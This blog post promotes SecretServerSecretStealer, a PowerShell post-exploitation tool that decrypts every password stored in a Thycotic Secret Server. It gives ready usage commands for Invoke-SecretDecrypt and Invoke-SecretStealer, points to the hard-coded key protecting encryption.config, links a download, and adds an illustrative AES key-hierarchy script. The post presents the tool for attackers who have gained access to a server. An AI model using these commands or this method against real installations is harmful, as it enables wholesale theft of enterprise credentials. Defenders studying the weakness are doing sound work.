SecretServerSecretStealer: Decrypt Thycotic Server Passwords!

Exciting things are being done in PowerShell nowadays and it is becoming like Python. A good example is my last post about PivotAll. This post is about another such tool: SecretServerSecretStealer.


What is SecretServerSecretStealer?

SecretServerSecretStealer (Invoke-SecretStealer) is an open source PowerShell script that decrypts passwords and other information stored in a Thycotic Secret Server installation. It exposes the following functions:

  1. Invoke-SecretDecrypt: Decrypts a single secret item; you pass the required values manually. Retrieve the following fields from the database: tbSecret.key, tbSecret.IvMEK, tbSecretItem.IV and tbSecretItem.ItemValue, and point it at the installation's encryption.config, which holds the master key.

    Invoke-SecretDecrypt -EncryptionConfig C:\Users\user\encryption.config -Item 9993c5097491ba2b42a10b9a9b7a6ab7239b107337c348086eeb5f5b29c76f33 -IV CF4C2D4F7FA432D64D9712212A06EEA9 -Key 5C195A500A3BF87C29163A52AC4EA2CFF6C5B69407B6F91A7C7B100B6D20121AAFD052C11B13D542EA2F42137258C2EF -IvMEK 6080667306DA295A75E22667E9AD0376
  2. Invoke-SecretStealer: Designed to be run on the Thycotic Secret Server machine itself; it takes only the web root as a parameter. Invoke-SecretStealer decrypts the database configuration, connects to the application's database to extract the relevant rows, and then decrypts every secret contained within to cleartext.

    Invoke-SecretStealer -WebRoot 'C:\inetpub\wwwroot\SecretServer'

Thycotic Secret Server allows you to store, distribute, modify and audit enterprise passwords in a secure environment. Every entry (secret) is stored as multiple items, such as the password, name, URL, etc. Each item is encrypted with an intermediate key that is specific to that entry. That intermediate key is in turn encrypted with a master key, which is unique to each installation and stored in the encryption.config file. The encryption.config file itself is a binary serialized object that is encrypted with a hard-coded key and initialization vector (hint: the Thycotic.ihawu.Base.FileHydrator class). The consequence is that anyone who can read encryption.config together with the database (or the web root, which holds the database connection details) can recover every stored secret.
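The two-level key hierarchy described above, as an added PowerShell example that is not code from SecretStealer or from Thycotic. It assumes AES-256-CBC with PKCS7 padding at both levels (this page does not state the real algorithm or parameters), generates a random master key in place of the one that would come out of encryption.config, builds the four database fields that Invoke-SecretDecrypt expects (tbSecret.key, tbSecret.IvMEK, tbSecretItem.IV, tbSecretItem.ItemValue), and then unwraps them the way the script does: master key first, then the item. The function names and the sample password are my own.

```powershell
# Added example: a model of Secret Server's two-level encryption, not the real
# implementation. Assumption: AES-256-CBC + PKCS7 at both levels.

function ConvertFrom-Hex {
    param([Parameter(Mandatory)][string]$Hex)
    [byte[]]$bytes = for ($i = 0; $i -lt $Hex.Length; $i += 2) {
        [Convert]::ToByte($Hex.Substring($i, 2), 16)
    }
    return ,$bytes
}

function ConvertTo-Hex {
    param([Parameter(Mandatory)][byte[]]$Bytes)
    return ($Bytes | ForEach-Object { $_.ToString('X2') }) -join ''
}

# One AES-CBC operation; -Decrypt selects the direction.
function Invoke-AesCbc {
    param(
        [Parameter(Mandatory)][byte[]]$Key,
        [Parameter(Mandatory)][byte[]]$IV,
        [Parameter(Mandatory)][byte[]]$Data,
        [switch]$Decrypt
    )
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $aes.Key = $Key
        $aes.IV  = $IV
        $xform = if ($Decrypt) { $aes.CreateDecryptor() } else { $aes.CreateEncryptor() }
        try { return ,$xform.TransformFinalBlock($Data, 0, $Data.Length) }
        finally { $xform.Dispose() }
    } finally { $aes.Dispose() }
}

# Takes the same hex fields as Invoke-SecretDecrypt, but with the master key
# passed directly instead of being read out of encryption.config.
function Unprotect-SecretItem {
    param(
        [Parameter(Mandatory)][byte[]]$MasterKey,  # MEK (would come from encryption.config)
        [Parameter(Mandatory)][string]$Key,        # tbSecret.key: intermediate key wrapped under the MEK
        [Parameter(Mandatory)][string]$IvMEK,      # tbSecret.IvMEK: IV used for that wrapping
        [Parameter(Mandatory)][string]$IV,         # tbSecretItem.IV
        [Parameter(Mandatory)][string]$Item        # tbSecretItem.ItemValue
    )
    # Step 1: MEK + IvMEK unwrap the per-secret intermediate key.
    $intermediateKey = Invoke-AesCbc -Key $MasterKey -IV (ConvertFrom-Hex $IvMEK) -Data (ConvertFrom-Hex $Key) -Decrypt
    # Step 2: intermediate key + item IV recover the item's cleartext.
    $plain = Invoke-AesCbc -Key $intermediateKey -IV (ConvertFrom-Hex $IV) -Data (ConvertFrom-Hex $Item) -Decrypt
    return [System.Text.Encoding]::UTF8.GetString($plain)
}

# Constructed demo: build the four database fields for one item, then decrypt them.
$rng = [System.Security.Cryptography.RandomNumberGenerator]::Create()
function New-RandomBytes([int]$Count) { $b = [byte[]]::new($Count); $rng.GetBytes($b); return ,$b }

$mek             = New-RandomBytes 32   # stands in for the installation's master key
$intermediateKey = New-RandomBytes 32   # one per secret (tbSecret row)
$ivMek           = New-RandomBytes 16
$itemIv          = New-RandomBytes 16

$fields = @{
    Key   = ConvertTo-Hex (Invoke-AesCbc -Key $mek -IV $ivMek -Data $intermediateKey)
    IvMEK = ConvertTo-Hex $ivMek
    IV    = ConvertTo-Hex $itemIv
    Item  = ConvertTo-Hex (Invoke-AesCbc -Key $intermediateKey -IV $itemIv -Data ([System.Text.Encoding]::UTF8.GetBytes('P@ssw0rd!')))
}

"Wrapped intermediate key ($($fields.Key.Length / 2) bytes): $($fields.Key)"
Unprotect-SecretItem -MasterKey $mek @fields    # prints P@ssw0rd!
```

Under this model a 32-byte intermediate key wrapped with CBC and PKCS7 comes out as 48 bytes (96 hex characters), which is the length of the -Key value in the Invoke-SecretDecrypt example above. The point is that the master key collapses the whole hierarchy: whoever reads encryption.config and the two tables needs nothing else, so encryption.config deserves at least the protection the database gets.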

This is useful post-exploitation once you have access to a Thycotic Secret Server, whether that is a shell on the server itself, a copy of encryption.config plus the database, or physical access to the machine. Surprisingly, Thycotic knows about this script and has released a support article here. An interesting cat and mouse game. Want to know who wins? Keep watching this space for the results!

Download SecretServerSecretStealer:

Get the latest version of SecretStealer.ps1 here.